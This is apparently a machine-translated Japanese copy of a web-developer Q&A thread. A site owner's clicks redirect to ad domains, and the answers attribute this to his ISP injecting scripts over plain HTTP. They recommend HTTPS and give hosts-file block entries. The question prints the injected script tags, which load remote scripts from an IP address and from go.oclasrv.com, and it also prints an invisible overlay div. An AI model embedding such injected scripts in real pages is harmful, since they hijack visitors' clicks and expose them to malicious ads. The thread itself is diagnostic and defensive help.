web-dev-qa-db-ja.com

不明なスクリプトが実行されており、クリックすると不明なWebサイトにリダイレクトされます

問題:-NAVBARメニューまたはbootstrap Webサイトのdivをクリックすると、新しい広告または不明なリンクにリダイレクトされることがありますこのようなタブ。

http://cobalten.com/afu.php?zoneid=1365143&var=1492756

ホストされたファイルからインポートされたリンク:-

<link rel="stylesheet" type="text/css" href="css\bootstrap.min.css">

    <script src="js/jquery.min.js"></script>
    <script src="js/main.js"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>


    <link rel="stylesheet" type="text/css" href="css\style.css">

    <link href="https://fonts.googleapis.com/css?family=Montserrat" rel="stylesheet" type="text/css">

    <link href="https://fonts.googleapis.com/css?family=Lato" rel="stylesheet" type="text/css">

    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.0.8/css/all.css" integrity="shaxxx-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
        crossorigin="anonymous">

<script src="https://maps.googleapis.com/maps/api/js?key=xxxxxxxxxxxxxxxxxxxxxxxxxx&callback=myMap "></script>

私が検査で得たもの:-

クリックメニューにリダイレクトがないときにコードを複数回チェックしました。疑わしいものは何も見つかりませんでした...しかし、クリック時にリダイレクトリンクを取得したときに、ブラウザでコードをチェックしたところ、スクリプトソースがいくつか追加されていることがはっきりとわかりました。ファイル(ブラウザの検査モードでのみ表示できます)これらは私のコードに書き込まれていません。私のコードの未知の部分は..

1)ここで次の2つのスクリプトは、headタグのスクリプトjs/jquery.min.jsを置き換えています

<script src='//117.240.205.115:3000/getjs?nadipdata="%7B%22url%22:%22%2Fjs%2Fjquery.min.js%22%2C%22referer%22:%22http:%2F%2Famans.xyz%2F%22%2C%22Host%22:%22amans.xyz%22%2C%22categories%22:%5B0%5D%2C%22reputations%22:%5B1%5D%7D"&amp;screenheight=768&amp;screenwidth=1360&amp;tm=1530041241377&amp;lib=true&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0' async=""></script>

<script src="http://amans.xyz/js/jquery.min.js?cb=1530041241381&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0&amp;onIframeFlag" type="text/javascript"></script>

2)これはグーグルAPIをインポートした直後にbodyタグに追加されています

<span id="notiMain">
<script src="//go.oclasrv.com/apu.php?zoneid=1492761" type="text/javascript">< /script>
</span>

3)これもbodyタグにあります。

<div class="pxdouz70egp12" style="left: 0px; top: 9360px; width: 658px; height: 650px; background-image: url("data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"); position: absolute; z-index: 2000; </div>

4)リダイレクトリンクの検査について。ヘッダー情報:-

Request URL: http://cobalten.com/apu.php?zoneid=1492761&_=1530105294644
Request Method: GET
Status Code: 200 OK
Remote Address: 188.42.162.184:80
Referrer Policy: no-referrer-when-downgrade
Cache-Control: private, max-age=0, no-cache
Connection: keep-alive
Content-Encoding: gzip
Content-Type: application/x-javascript
Date: Wed, 27 Jun 2018 13:14:57 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Pragma: no-cache
Server: nginx
Strict-Transport-Security: max-age=1
Timing-Allow-Origin: *, *
Transfer-Encoding: chunked
X-Content-Type-Options: nosniff
X-Used-AdExchange: 1
Provisional headers are shown
Referer: http://amans.xyz/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
zoneid: 1492761
_: 1530105294644

私が試したこと:-

私のコードはきれいで、どこかにリダイレクトするスクリプトはありません。それは私のブラウザまたはWindowsが危険にさらされている可能性があります。私は3つのブラウザからウェブサイトをチェックしましたEdge、CHROME、FIREFOX ..同じ問題が発生しました。次に、Win7からWindows 10にアップグレードし、新規インストールを行いました。しかし、何も起こりませんでした。次に、サーバーが危険にさらされているかどうかをHostgatorサポートに尋ねようと思いました。彼らは、最後から大丈夫だと答えました...私はmalwarebytesとそれを解決するためのすべてのソフトウェアをインストールしました...しかし、彼らはchrome/firefox/Edgeがにリダイレクトしていることを通知します一部のドメイン名を持つアウトバウンドIDは、ほとんどがgo.oclasrv.comであり、何もしません。

****

任意の解決策???

****

更新:-

Hostgatorサポートフィードバックリンクで同様のリダイレクトを受け取りました。

気づいたら、ここでは文字列のドメイン名がrateus.inに置き換えられます。zoneid= 1492761は、開いている安全でないリンクと同じです。指紋= c2VwLW5vLXJlZGlyZWN0は、開いたすべてのリンクで同じです。

<script async="" src="//117.240.205.115:3000/getjs?nadipdata=&quot;%7B%22url%22:%22%2Fcommon%2Fjs%2Fjquery-1.7.1.js%22%2C%22referer%22:%22http:%2F%2Frateus.co.in%2Findex.php%3Fbrowse%3DHostGatorIN_Chat_HGIChatCSAT%22%2C%22Host%22:%22rateus.co.in%22%2C%22categories%22:%5B0%5D%2C%22reputations%22:%5B1%5D%7D&quot;&amp;screenheight=768&amp;screenwidth=1360&amp;tm=1530191489196&amp;lib=true&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0"></script>

<script type="text/javascript" src="http://rateus.co.in/common/js/jquery-1.7.1.js?cb=1530191489199&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0&amp;onIframeFlag"></script>

<span id="notiMain"><script type="text/javascript" src="//go.oclasrv.com/apu.php?zoneid=1492761"></script></span>

私のOSは完全にWIN10proにアップグレードされており、プラグインなしでChromeのみをインストールしました...

EdgeとFirefoxで同じ結果が得られたため、問題はブラウザに依存しません。

ここで私を助けてくれるJSの専門家

11
aman

これは、ISPがJavaScriptファイルを挿入する場合のようです。たまたまBSNLブロードバンドを利用していますか。過去数日間、BSNLはHTTP(暗号化されていない)サイトにアドウェアを注入しているようです。

私が知っている唯一の解決策は、https OR ISPを変更してサイトをホストすることです。

8
Jayson Chacko

あなたが抱えているこの問題はサーバーサイドです。コードに問題はないようですが、サーバーはマルウェアに感染しており、この不正なコードをWebサイトに挿入しています。

これを解決するために、私はあなたが書いたコードのバックアップを作成し、FTPホスティングパスワードを変更し、サーバーを消去し、コードを追加し直します。これで問題が解決しない場合は、ホスティングプロバイダーを変更します。

1
Jake Chasan

次のIPから挿入された不明なスクリプトが表示された場合、それはBSNLISPによって挿入されたスクリプトファイルです。

61.0.245.90, 117.205.13.171

これらのスクリプトは、HTTPWebサイトにアクセスしたときにのみ挿入されます。 HTTPSにはトランスポート層セキュリティが含まれているため、ISPによって改ざんされることはありません。

このIPからのスクリプトファイルは単なるコンジットであり、さまざまなADメディアからさらにADスクリプトをダウンロードします。このADメディアのほとんどは、ユーザーのマウスクリックをハイジャックしてポップアップを開くことにより、邪魔な広告を追跡します。

そのような活動に対するBSNLの言い訳は、それが加入者のブラウジング体験を向上させる機能であるということです。 BSNLがそのようなスクリプトを挿入する とそれらを停止する方法について書かれた詳細な投稿があります。

0
David Chelliah

グッドキャッチ!

BSNLサーバーは、セキュリティが不十分なため、マルウェア/ウイルスに日々破損または感染しています。

naganoadigei.comが明示的に登録され、マルウェアにサービスを提供し、ユーザーをフィッシングサイトにリダイレクトしました。

最近、2019年2月に、彼らは問題を解決しました。しかし残念ながら、2019年2月の時点でhumparsi.comであった新しいタイプの広告ベースのリダイレクトが見つかりました

Sucuri にアクセスすると、サイトが感染しているかどうかを確認できます。


または、DNSエントリでスタンドアロンシステムによる送信リクエストをブロックすることもできます

案内する %windir%\System32\drivers\etcそしてhostsファイルを管理者認証で昇格モードで編集し、これらの行をhostsファイル

0.0.0.0 preskalyn.com
0.0.0.0 xalabazar.com
0.0.0.0 humparsi.com
0.0.0.0 naganoadigei.com
0.0.0.0 cobalten.com
0.0.0.0 rateus.co.in
0.0.0.0 go.oclasrv.com
0.0.0.0 onclickmax.com
0.0.0.0 bsnl.phozeca.com
0.0.0.0 phozeca.com
0.0.0.0 c.phozeca.com

上記のサイトはSSLで保護されていません

特定のIPアドレスをブロックするには、ファイアウォールの発信境界をブロックします。

影響や起こりそうもない悪影響を減らすために、NoScriptScriptSafeなどのアドオンをインストールしてJavaScriptをブロックできます HTTPS Everywhere

ポート番号が割り当てられたIPアドレスを使用しているアプリケーションを見つけるには:

C:\Windows\system32>netstat -anob